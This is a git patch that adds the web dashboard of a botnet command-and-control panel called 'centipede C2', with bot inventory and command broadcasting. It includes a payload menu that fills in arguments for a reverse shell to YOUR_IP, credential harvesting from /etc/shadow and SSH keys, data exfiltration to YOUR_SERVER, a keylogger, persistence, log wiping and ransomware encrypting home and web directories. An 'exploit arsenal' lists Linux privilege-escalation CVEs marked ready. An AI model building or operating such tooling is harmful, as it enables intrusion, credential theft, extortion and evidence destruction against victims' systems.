From b1738253fbc8c2ace2b50d2f4243e4b78b8ece8d Mon Sep 17 00:00:00 2001 From: ek0ms savi0r Date: Sun, 31 May 2026 04:04:11 +0000 Subject: [PATCH] Upload files to "/" --- app.js | 327 +++++++++++++++++++++++++++++++++++++++++++ dark.css | 402 +++++++++++++++++++++++++++++++++++++++++++++++++++++ index.html | 161 +++++++++++++++++++++ 3 files changed, 890 insertions(+) create mode 100644 app.js create mode 100644 dark.css create mode 100644 index.html diff --git a/app.js b/app.js new file mode 100644 index 0000000..f71ee2c --- /dev/null +++ b/app.js @@ -0,0 +1,327 @@ +const API = '/api'; +let ws = null; +let bots = {}; +let commands = {}; + +// Initialize +document.addEventListener('DOMContentLoaded', () => { + loadStats(); + loadBots(); + loadCommands(); + loadPayloads(); + loadExploits(); + + // Navigation + document.querySelectorAll('.nav-links li').forEach(li => { + li.addEventListener('click', () => { + document.querySelectorAll('.nav-links li').forEach(l => l.classList.remove('active')); + li.classList.add('active'); + document.querySelectorAll('.view').forEach(v => v.classList.remove('active')); + document.getElementById('view-' + li.dataset.view).classList.add('active'); + }); + }); + + // Refresh + document.getElementById('btn-refresh').addEventListener('click', () => { + loadStats(); loadBots(); + }); + + // Quick command + document.getElementById('btn-send-cmd').addEventListener('click', sendQuickCommand); + + // Command all + document.getElementById('btn-command-all').addEventListener('click', () => { + showCommandModal('all'); + }); + + // Broadcast + document.getElementById('btn-broadcast').addEventListener('click', () => { + showCommandModal('all'); + }); + + // Search + document.getElementById('bot-search').addEventListener('keyup', filterBots); + + // Auto-refresh + setInterval(loadStats, 10000); + setInterval(loadBots, 15000); + + // Connect to WebSocket for live updates + connectWS(); +}); + +function connectWS() { + const protocol = window.location.protocol === 'https:' ? 'wss:' : 'ws:'; + ws = new WebSocket(`${protocol}//${window.location.host}/ws`); + + ws.onopen = () => { + addActivity('system', 'WebSocket connected'); + }; + + ws.onmessage = (event) => { + try { + const data = JSON.parse(event.data); + handleWSMessage(data); + } catch(e) {} + }; + + ws.onclose = () => { + addActivity('system', 'WebSocket disconnected, reconnecting...'); + setTimeout(connectWS, 5000); + }; +} + +function handleWSMessage(data) { + switch(data.t) { + case 'bot_register': + addActivity('bot', `New bot: ${data.hostname} (${data.bid.slice(0,8)})`); + break; + case 'bot_result': + addActivity('result', `[${data.bid.slice(0,8)}] ${data.out ? data.out.slice(0,80) : 'completed'}`); + break; + } +} + +function addActivity(type, message) { + const log = document.getElementById('activity-log'); + const entry = document.createElement('div'); + entry.className = 'activity-entry'; + const time = new Date().toLocaleTimeString(); + entry.innerHTML = `[${time}] ${type} ${escapeHTML(message)}`; + log.insertBefore(entry, log.firstChild); + while (log.children.length > 100) log.removeChild(log.lastChild); +} + +function escapeHTML(str) { + return str.replace(/&/g,'&').replace(//g,'>'); +} + +// Stats +async function loadStats() { + try { + const r = await fetch(`${API}/stats`); + const stats = await r.json(); + document.getElementById('total-bots').textContent = stats.total_bots; + document.getElementById('connected-bots').textContent = stats.connected; + document.getElementById('root-bots').textContent = stats.root_bots; + } catch(e) {} +} + +// Bots +async function loadBots() { + try { + const r = await fetch(`${API}/bots`); + const list = await r.json(); + bots = {}; + list.forEach(b => { bots[b.id] = b; }); + renderBots(); + } catch(e) {} +} + +function renderBots() { + const tbody = document.getElementById('bot-list'); + tbody.innerHTML = ''; + Object.values(bots).forEach(b => { + const tr = document.createElement('tr'); + const status = b.connected ? 'online' : 'offline'; + tr.innerHTML = ` + ${b.id.slice(0,12)}... + ${escapeHTML(b.hostname)} + ${b.ip || '-'} + ${b.os || '-'}/${b.arch || '-'} + ${b.kernel ? b.kernel.slice(0,30) : '-'} + ${status} + ${b.privilege || 'user'} + L${b.layer + 1} + + + + + `; + tbody.appendChild(tr); + }); + + // Tag inputs + document.querySelectorAll('.tag-input').forEach(inp => { + inp.addEventListener('change', async (e) => { + const botId = e.target.dataset.bot; + const tag = e.target.value; + await fetch(`${API}/bots/${botId}/tag`, { + method: 'POST', + headers: {'Content-Type': 'application/json'}, + body: JSON.stringify({tag}) + }); + }); + }); +} + +function filterBots() { + const q = document.getElementById('bot-search').value.toLowerCase(); + document.querySelectorAll('#bot-list tr').forEach(tr => { + tr.style.display = tr.textContent.toLowerCase().includes(q) ? '' : 'none'; + }); +} + +// Commands +async function loadCommands() { + try { + const r = await fetch(`${API}/commands`); + const list = await r.json(); + commands = {}; + list.forEach(c => { commands[c.id] = c; }); + renderCommands(); + } catch(e) {} +} + +function renderCommands() { + const tbody = document.getElementById('cmd-list'); + tbody.innerHTML = ''; + Object.values(commands).slice(0, 100).forEach(c => { + const tr = document.createElement('tr'); + tr.innerHTML = ` + ${c.id.slice(0,8)} + ${c.target} + ${escapeHTML(c.action)} + ${c.status} + ${c.result ? escapeHTML(c.result.slice(0,60)) : '-'} + ${new Date(c.created_at).toLocaleTimeString()} + `; + tbody.appendChild(tr); + }); +} + +async function sendCommand(target, action, args) { + const body = { + bot_id: target === 'all' ? '' : target, + action: action, + args: args || '' + }; + await fetch(`${API}/command`, { + method: 'POST', + headers: {'Content-Type': 'application/json'}, + body: JSON.stringify(body) + }); + addActivity('command', `${action} -> ${target}`); + setTimeout(loadCommands, 1000); +} + +function sendQuickCommand() { + const action = document.getElementById('cmd-action').value; + const args = document.getElementById('cmd-args').value; + sendCommand('all', action, args); +} + +function showCommandModal(target) { + const overlay = document.createElement('div'); + overlay.className = 'modal-overlay'; + overlay.innerHTML = ` +
+

Send Command ${target === 'all' ? '(All Bots)' : ''}

+ + +
+ + +
+
+ `; + document.body.appendChild(overlay); +} + +async function doSendModal(target) { + const action = document.getElementById('modal-action').value; + const args = document.getElementById('modal-args').value; + const overlay = document.querySelector('.modal-overlay'); + if (overlay) overlay.remove(); + await sendCommand(target, action, args); +} + +// Payloads +function loadPayloads() { + const payloads = [ + {name: 'Reverse Shell', desc: 'Spawn reverse or bind shell on target', action: 'payload', args: '{"name":"reverse_shell","host":"YOUR_IP","port":"4444"}'}, + {name: 'Persistence', desc: 'Install via systemd, cron, .bashrc hooks, and LD_PRELOAD', action: 'payload', args: '{"name":"persist"}'}, + {name: 'Credential Harvest', desc: 'Extract /etc/shadow, SSH keys, env vars, DB configs, cloud creds', action: 'payload', args: '{"name":"harvest"}'}, + {name: 'Lateral Movement', desc: 'Inject SSH keys, scan known_hosts, discover PSSH/Ansible infrastructure', action: 'payload', args: '{"name":"lateral"}'}, + {name: 'Network Pivot', desc: 'Enable IP forwarding, SOCKS proxy, NAT masquerade', action: 'payload', args: '{"name":"pivot","port":"1080"}'}, + {name: 'Keylogger', desc: 'Capture keystrokes from /dev/input devices', action: 'payload', args: '{"name":"keylog"}'}, + {name: 'Packet Sniff', desc: 'Capture network traffic with tcpdump', action: 'payload', args: '{"name":"sniff","interface":"eth0","filter":"port 80"}'}, + {name: 'System Enum', desc: 'Full system enumeration: kernel, users, network, docker, k8s, cloud', action: 'payload', args: '{"name":"enum"}'}, + {name: 'Data Exfil', desc: 'Exfiltrate binary and harvested data via HTTP POST', action: 'payload', args: '{"name":"exfil","target":"http://YOUR_SERVER","method":"http"}'}, + {name: 'Forensic Wipe', desc: 'Clear logs, history, journal, auditd, wtmp, randomize MAC', action: 'payload', args: '{"name":"wipe"}'}, + {name: 'Ransomware', desc: 'AES-256-GCM file encryption with operator-defined key. Specify key in args or let it generate one.', action: 'payload', args: '{"name":"ransomware","key":"","dirs":"/home,/root,/var/www"}'}, + {name: 'Ransomware Decrypt', desc: 'Decrypt .centipede files using the same key used for encryption.', action: 'payload', args: '{"name":"ransomware_decrypt","key":"YOUR_HEX_KEY"}'}, + {name: 'Self Destruct', desc: 'Remove all traces, delete binary, and exit', action: 'payload', args: '{"name":"selfdestruct"}'}, + ]; + + const grid = document.getElementById('payload-list'); + payloads.forEach(p => { + const card = document.createElement('div'); + card.className = 'payload-card'; + card.innerHTML = `

${p.name}

${p.desc}

`; + card.addEventListener('click', () => { + document.getElementById('cmd-action').value = p.action; + document.getElementById('cmd-args').value = p.args; + addActivity('payload', `Selected: ${p.name}`); + }); + grid.appendChild(card); + }); +} + +// Exploits +function loadExploits() { + const exploits = [ + { + name: 'dirtyfrag', + cve: 'CVE-2026-43284 + CVE-2026-43500', + desc: 'xfrm-ESP + RxRPC page-cache write chain. Linux 4.x through 6.x. Required kernel modules: esp4, rxrpc.', + status: 'ready', + range: '2017 - Present' + }, + { + name: 'Dirty Pipe', + cve: 'CVE-2022-0847', + desc: 'Direct pipe write to overwrite read-only files. Linux 5.8 - 5.16.', + status: 'ready', + range: '5.8 - 5.16' + }, + { + name: 'PwnKit', + cve: 'CVE-2021-4034', + desc: 'pkexec argument parsing vulnerability. All distributions with pkexec installed.', + status: 'ready', + range: '2009 - 2022' + }, + { + name: 'GameOverlay', + cve: 'CVE-2023-3269', + desc: 'Ubuntu overlayfs LPE. Ubuntu kernels with overlayfs support.', + status: 'ready', + range: '5.x - 6.x (Ubuntu)' + }, + ]; + + const list = document.getElementById('exploit-list'); + exploits.forEach(e => { + const item = document.createElement('div'); + item.className = 'exploit-item'; + item.innerHTML = ` +

${e.name} ${e.status}

+

CVE: ${e.cve}

+

${e.desc}

+

Kernel Range: ${e.range}

+ `; + list.appendChild(item); + }); +} diff --git a/dark.css b/dark.css new file mode 100644 index 0000000..7acc879 --- /dev/null +++ b/dark.css @@ -0,0 +1,402 @@ +:root { + --bg-primary: #0a0a0a; + --bg-secondary: #111111; + --bg-tertiary: #1a1a1a; + --bg-card: #141414; + --text-primary: #e0e0e0; + --text-secondary: #888888; + --accent: #00ff41; + --accent-secondary: #ff6600; + --danger: #ff0033; + --warning: #ffaa00; + --border: #222222; + --success: #00ff41; + --info: #00aaff; +} + +* { margin: 0; padding: 0; box-sizing: border-box; } + +body { + background: var(--bg-primary); + color: var(--text-primary); + font-family: 'Courier New', 'Consolas', monospace; + font-size: 14px; + overflow: hidden; + height: 100vh; +} + +#app { + display: flex; + height: 100vh; +} + +#sidebar { + width: 260px; + background: var(--bg-secondary); + border-right: 1px solid var(--border); + display: flex; + flex-direction: column; + padding: 20px; +} + +.logo { + display: flex; + align-items: center; + gap: 10px; + margin-bottom: 24px; + padding-bottom: 16px; + border-bottom: 1px solid var(--border); +} + +.logo .icon { font-size: 24px; } +.logo h1 { + font-size: 20px; + color: var(--accent); + letter-spacing: 2px; + text-transform: uppercase; +} +.logo .version { + font-size: 10px; + color: var(--text-secondary); + margin-left: auto; +} + +.nav-stats { + display: grid; + grid-template-columns: repeat(3, 1fr); + gap: 8px; + margin-bottom: 24px; +} + +.stat-card { + background: var(--bg-tertiary); + border: 1px solid var(--border); + border-radius: 4px; + padding: 12px 8px; + text-align: center; +} + +.stat-value { + display: block; + font-size: 24px; + font-weight: bold; + color: var(--accent); + margin-bottom: 4px; +} + +.stat-label { + font-size: 10px; + color: var(--text-secondary); + text-transform: uppercase; + letter-spacing: 1px; +} + +.nav-links { + list-style: none; + flex: 1; +} + +.nav-links li a { + display: block; + padding: 12px 16px; + color: var(--text-secondary); + text-decoration: none; + border-left: 2px solid transparent; + transition: all 0.2s; + letter-spacing: 1px; + text-transform: uppercase; + font-size: 12px; +} + +.nav-links li:hover a, +.nav-links li.active a { + color: var(--accent); + border-left-color: var(--accent); + background: rgba(0, 255, 65, 0.05); +} + +#content { + flex: 1; + padding: 24px; + overflow-y: auto; +} + +.view { display: none; } +.view.active { display: block; } + +.view-header { + display: flex; + justify-content: space-between; + align-items: center; + margin-bottom: 24px; +} + +.view-header h2 { + font-size: 18px; + color: var(--text-primary); + letter-spacing: 2px; + text-transform: uppercase; +} + +.header-controls { + display: flex; + gap: 8px; + align-items: center; +} + +/* Buttons */ +.btn { + background: var(--bg-tertiary); + border: 1px solid var(--border); + color: var(--text-primary); + padding: 8px 16px; + cursor: pointer; + font-family: inherit; + font-size: 12px; + letter-spacing: 1px; + text-transform: uppercase; + transition: all 0.2s; +} + +.btn:hover { + border-color: var(--accent); + color: var(--accent); +} + +.btn-accent { + background: var(--accent); + color: var(--bg-primary); + border-color: var(--accent); + font-weight: bold; +} + +.btn-accent:hover { + background: transparent; + color: var(--accent); +} + +.btn-danger { + background: var(--danger); + color: #fff; + border-color: var(--danger); +} + +.btn-danger:hover { + background: transparent; + color: var(--danger); +} + +/* Panels */ +.dashboard-grid { + display: grid; + grid-template-columns: 2fr 1fr; + gap: 16px; +} + +.panel { + background: var(--bg-card); + border: 1px solid var(--border); + border-radius: 4px; + margin-bottom: 16px; +} + +.panel-header { + padding: 12px 16px; + border-bottom: 1px solid var(--border); + font-size: 12px; + letter-spacing: 2px; + text-transform: uppercase; + color: var(--accent); +} + +.panel-body { padding: 16px; } + +/* Inputs */ +.input { + background: var(--bg-primary); + border: 1px solid var(--border); + color: var(--text-primary); + padding: 8px 12px; + font-family: inherit; + font-size: 13px; + width: 100%; + margin-bottom: 8px; +} + +.input:focus { + outline: none; + border-color: var(--accent); +} + +select.input { + cursor: pointer; +} + +/* Tables */ +table { + width: 100%; + border-collapse: collapse; +} + +th, td { + padding: 10px 12px; + text-align: left; + border-bottom: 1px solid var(--border); + font-size: 12px; +} + +th { + color: var(--accent); + letter-spacing: 1px; + text-transform: uppercase; + font-size: 11px; +} + +tr:hover td { + background: rgba(0, 255, 65, 0.03); +} + +/* Status indicators */ +.status-online { color: var(--success); } +.status-offline { color: var(--text-secondary); } +.status-pending { color: var(--warning); } +.status-completed { color: var(--success); } +.status-failed { color: var(--danger); } + +.layer-dot { + display: inline-block; + width: 8px; + height: 8px; + border-radius: 50%; + margin-right: 4px; + margin-left: 12px; +} +.layer-dot:first-child { margin-left: 0; } +.layer-dot.green { background: var(--success); } +.layer-dot.gray { background: var(--text-secondary); } + +/* Payload grid */ +.payload-grid { + display: grid; + grid-template-columns: repeat(auto-fill, minmax(280px, 1fr)); + gap: 12px; + padding: 8px; +} + +.payload-card { + background: var(--bg-card); + border: 1px solid var(--border); + border-radius: 4px; + padding: 16px; + cursor: pointer; + transition: all 0.2s; +} + +.payload-card:hover { + border-color: var(--accent); + transform: translateY(-2px); +} + +.payload-card h3 { + color: var(--accent); + font-size: 14px; + margin-bottom: 8px; + letter-spacing: 1px; + text-transform: uppercase; +} + +.payload-card p { + color: var(--text-secondary); + font-size: 12px; + line-height: 1.5; +} + +/* Scrollbar */ +::-webkit-scrollbar { width: 6px; } +::-webkit-scrollbar-track { background: var(--bg-primary); } +::-webkit-scrollbar-thumb { background: var(--border); } +::-webkit-scannerbar-thumb:hover { background: var(--accent); } + +/* Activity log */ +#activity-log { + max-height: 300px; + overflow-y: auto; + font-size: 11px; +} + +.activity-entry { + padding: 6px 0; + border-bottom: 1px solid rgba(255,255,255,0.05); + color: var(--text-secondary); +} + +.activity-entry .time { color: var(--text-secondary); } +.activity-entry .event { color: var(--accent); } + +/* Exploit items */ +.exploit-item { + background: var(--bg-tertiary); + border: 1px solid var(--border); + border-radius: 4px; + padding: 16px; + margin-bottom: 8px; +} + +.exploit-item h4 { + color: var(--accent-secondary); + margin-bottom: 8px; + letter-spacing: 1px; +} + +.exploit-item .status { + display: inline-block; + padding: 2px 8px; + font-size: 10px; + text-transform: uppercase; + letter-spacing: 1px; + border-radius: 2px; +} + +.exploit-item .status.ready { background: rgba(0,255,65,0.1); color: var(--success); } +.exploit-item .status.pending { background: rgba(255,170,0,0.1); color: var(--warning); } + +/* Layer info layout */ +.layer-info { + display: flex; + flex-direction: column; + gap: 6px; + font-size: 12px; +} + +/* Modal */ +.modal-overlay { + position: fixed; + top: 0; left: 0; right: 0; bottom: 0; + background: rgba(0,0,0,0.8); + display: flex; + align-items: center; + justify-content: center; + z-index: 100; +} + +.modal { + background: var(--bg-secondary); + border: 1px solid var(--border); + border-radius: 4px; + padding: 24px; + min-width: 400px; +} + +.modal h3 { + color: var(--accent); + margin-bottom: 16px; + letter-spacing: 1px; + text-transform: uppercase; +} + +.modal-actions { + display: flex; + gap: 8px; + justify-content: flex-end; + margin-top: 16px; +} diff --git a/index.html b/index.html new file mode 100644 index 0000000..3f8aad0 --- /dev/null +++ b/index.html @@ -0,0 +1,161 @@ + + + + + + centipede C2 + + + +
+ + +
+ +
+
+

Dashboard

+
+ + +
+
+
+
+
Bot Activity
+
+
+
+
+
+
Quick Command
+
+ + + +
+
+
+
C2 Layer Status
+
+
+ WebSocket + DNS Tunnel + Discord + ICMP +
+
+
+
+
+ + +
+
+

Bots

+
+ + +
+
+
+
+ + + + + + + + + + + + + + + + +
IDHostnameIPOS/ArchKernelStatusPrivilegeLayerTagActions
+
+
+
+ + +
+
+

Command History

+
+
+
+ + + + + +
IDTargetActionStatusResultTime
+
+
+
+ + +
+
+

Payload Suite

+
+
+
+ + +
+
+

Exploit Arsenal

+
+
+
+
+
+
+
+ + + +